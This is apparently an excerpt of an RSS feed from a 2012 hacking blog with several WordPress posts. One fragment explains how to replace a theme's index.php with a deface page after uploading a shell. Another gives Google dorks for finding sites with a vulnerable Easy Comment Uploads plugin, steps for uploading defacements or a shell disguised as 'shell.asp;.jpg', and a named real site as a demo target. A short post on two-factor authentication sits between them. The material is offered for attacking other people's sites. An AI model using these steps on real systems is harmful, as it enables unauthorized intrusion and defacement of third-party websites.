&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiLmMYIaLfilTtekMfclJ7RUppUF0klBgBpWm26qxJwyDLcEtUFagGsP5lXWYWKA-YW1L-wZXyXe86e1m-pKUNPqyDyl46YjRjTPr2s2I1p5O-anbvBGRcBLS_Y0JviJJB1tF2qNLqsA/s1600/wp2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiLmMYIaLfilTtekMfclJ7RUppUF0klBgBpWm26qxJwyDLcEtUFagGsP5lXWYWKA-YW1L-wZXyXe86e1m-pKUNPqyDyl46YjRjTPr2s2I1p5O-anbvBGRcBLS_Y0JviJJB1tF2qNLqsA/s640/wp2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmlJBJ8nRstHyfLmm22YJnulteXYo4SflNLKNkCtUJCfYb4FtBqjq6k8y87NIvJVMqEnaIm9jmD2ED9LZJx_O7g1OLnsmhGPv4lOLSNh1Jz7-Xu2ZkVIWlNwxDWWDKXIGpuNaGlEFFNg/s1600/wp3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmlJBJ8nRstHyfLmm22YJnulteXYo4SflNLKNkCtUJCfYb4FtBqjq6k8y87NIvJVMqEnaIm9jmD2ED9LZJx_O7g1OLnsmhGPv4lOLSNh1Jz7-Xu2ZkVIWlNwxDWWDKXIGpuNaGlEFFNg/s400/wp3.jpg" width="330" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b style="color: red;"&gt;Bypassing Permission Denided for index.php in wordpress&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
sometimes after upload shell on wordpress website when you'll try to replace index.php's socurce code in public_html/ directory with you deface page, it will show error like permission denided, can't write in file etc, and sometimes permission change dones't work, then follow the same method whic is give above, change active theme's index.php file and home will chnage with your deface page.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: red;"&gt;&lt;b&gt;Simple :)&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;b style="color: red;"&gt;Keep Visiting &lt;a href="http://www.indicyborg.blogspot.in/"&gt;www.indicyborg.blogspot.in&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj51rwboLY2HSk5aAStO22NhzXMbOASI06Ydyev6IikzdGBJbGUu4FdxLgT9HyaluG-TETGxYfNHAUtKsGQ3u4uvNjHD9HTGB7I82MuMz8_WHhoetfCTLn1bsan7rj9j2rfoR16fsNfPA/s72-c/wp1.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Two factor Authentication on wordpress</title><link>http://indicyborg.blogspot.com/2012/08/two-factor-authentication-on-wordpress.html</link><category>Hacking</category><category>Website Hacking</category><category>WordPress Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 10 Aug 2012 04:48:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-4975887206565544340</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;What is two factor authentication ?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Two –Factor authentication is commonly found in electronic computer authentication, where basic authentication is the process of a requesting entity presenting some evidence of its identity to a second entity. Two-factor authentication seeks to decrease the probability that the requestor is presenting false evidence of its identity .&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Duo Security Overview&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Duo Security provides two-factor authentication as a service built to prevent account takeover and online fraud. Protect remote access with drop-in support for most VPNs and Unix, or add login or transaction verification to any website with Duo's powerful web APIs.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Benefits using Duo Security&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Compliance: Easily meet federal and industry regulations for strong authentication such as PCI DSS and HIPAA.&lt;br /&gt;
Cost-effective: No hardware to deploy and manage, and self- service user enrollment to reduce administrative burden.&lt;br /&gt;
Scalable: Duo leverages the cloud to rapidly scale as your user base grows, removing the need for onsite infrastructure.&lt;br /&gt;
Compatible: Integrates seamlessly with existing technology investments and end-user smartphone platforms.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjshQmr88AyvHjbgJ449irw1ahzQdYHRoqa1r-_8exe_A02_XIAbAZ2YJ_aQ1VG3_Gq4rKlRjwtKPYL90_ZcQXHdPhvXlcoKOtdvhkQIOEvXum5RbrHUp5R5v7Xa-vsc58RAoLmEC55_A/s1600/conv.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="416" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjshQmr88AyvHjbgJ449irw1ahzQdYHRoqa1r-_8exe_A02_XIAbAZ2YJ_aQ1VG3_Gq4rKlRjwtKPYL90_ZcQXHdPhvXlcoKOtdvhkQIOEvXum5RbrHUp5R5v7Xa-vsc58RAoLmEC55_A/s640/conv.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;The content of this Article “Two-Factor Authentication on wordpress’’ is for public to know more about it and information is provided by various sources.&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjshQmr88AyvHjbgJ449irw1ahzQdYHRoqa1r-_8exe_A02_XIAbAZ2YJ_aQ1VG3_Gq4rKlRjwtKPYL90_ZcQXHdPhvXlcoKOtdvhkQIOEvXum5RbrHUp5R5v7Xa-vsc58RAoLmEC55_A/s72-c/conv.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Wordpress Exploit : 10,000+ Websites are Vunerable For this attack</title><link>http://indicyborg.blogspot.com/2012/08/wordpress-exploit-10000-websites-are.html</link><category>Hacking</category><category>Website Hacking</category><category>WordPress Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 10 Aug 2012 04:44:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-3922042185713216750</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbqWtK_l0Kt2zSvo3qiDoozG9nqUNgaBPiNtkZ81IAxIr6vqJKW7Cz1SdNUzJwXEOnRvqeydPOxfIhdJeexPO0C4ob05N5jX3U69nyDkULaENia2k2n7hL4UqcX3pwq9LAqu4VkqS2-w/s1600/wordpress-hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbqWtK_l0Kt2zSvo3qiDoozG9nqUNgaBPiNtkZ81IAxIr6vqJKW7Cz1SdNUzJwXEOnRvqeydPOxfIhdJeexPO0C4ob05N5jX3U69nyDkULaENia2k2n7hL4UqcX3pwq9LAqu4VkqS2-w/s400/wordpress-hacked.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;This venerability is known as WordPress Easy Comment Upload Venerability.&lt;br /&gt;
&lt;b style="color: red;"&gt;Google dorks:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: blue;"&gt;"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"&lt;/span&gt;&lt;br style="color: blue;" /&gt;&lt;span style="color: blue;"&gt;/wp-content/plugins/easy-comment-uploads/upload-form.php&lt;/span&gt;&lt;br style="color: blue;" /&gt;&lt;span style="color: blue;"&gt;Index of /wp-content/plugins/easy-comment-uploads&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open Google and enetr any dork which Given,&lt;br /&gt;
Now selct any website&lt;br /&gt;
and goto this url &lt;b&gt;site.com/wp-content/plugins/easy-comment-uploads/upload-form.php&lt;/b&gt;&lt;br /&gt;
You'll Got Upload Option here :)&lt;br /&gt;
Now Upload Your Deface ....&lt;br /&gt;
and check it here&lt;b&gt; site.com/wp-content/uploads/2011/05/yourfilehere&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;DEMO:&lt;/b&gt;&lt;span&gt;&lt;span style="background-color: white;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="background-color: white; color: blue;"&gt;http://www.findthepearl.com/&lt;/span&gt;&lt;br style="background-color: white; color: blue;" /&gt;&lt;span style="background-color: white; color: blue;"&gt;http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Happy Hacking :p&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbqWtK_l0Kt2zSvo3qiDoozG9nqUNgaBPiNtkZ81IAxIr6vqJKW7Cz1SdNUzJwXEOnRvqeydPOxfIhdJeexPO0C4ob05N5jX3U69nyDkULaENia2k2n7hL4UqcX3pwq9LAqu4VkqS2-w/s72-c/wordpress-hacked.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">11</thr:total></item></channel></rss>